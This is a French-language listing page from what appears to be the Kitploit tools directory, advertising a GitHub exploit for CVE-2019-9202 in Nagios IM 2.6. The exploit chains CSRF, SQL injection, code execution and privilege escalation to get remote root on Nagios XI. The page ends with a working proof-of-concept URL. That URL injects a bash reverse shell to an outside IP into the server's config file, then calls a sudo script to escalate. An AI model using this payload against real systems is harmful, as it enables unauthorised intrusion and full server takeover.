Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2019-9202 — Exploit d'exécution de code à distance pour Nagios IM 2.6 : CSRF + SQLi + RCE + LPE --> root à distance | Kitploit
Outils/GitHubGitHub/polict/cve-2019-9202
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubpolict/cve-2019-9202

CVE-2019-9202

Exploit d'exécution de code à distance pour Nagios IM 2.6 : CSRF + SQLi + RCE + LPE --> root à distance

Voir le dépôt
4il y a 7 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-9202

Exploit d'exécution de code à distance sur Nagios IM 2.6 : CSRF + SQLi + RCE + LPE --> root distant

Description

En enchaînant une Cross-Site Request Forgery (CSRF) / contournement d'autorisation (CVE-2019-9203), il est possible d'exploiter une injection SQL basée sur UNION (CVE-2019-9204), une exécution de code à distance (RCE) (CVE-2019-9202) et une élévation de privilèges locale (LPE) (CVE-2019-9166), obtenant ainsi les privilèges root sur un serveur Nagios XI distant.

Prérequis

La victime doit être authentifiée dans Nagios XI ; à ma connaissance, les privilèges les plus faibles suffisent.

PoC

http://nagiosxi.local/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id='union%20select%201,2,3,4,"';echo%20%27print%28\"bash+-i+%3e%26+/dev/tcp/192.168.13.37/31337+0%3e%261+%23\"%29%3b'%3e%3e+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'x

Télécharger l’outil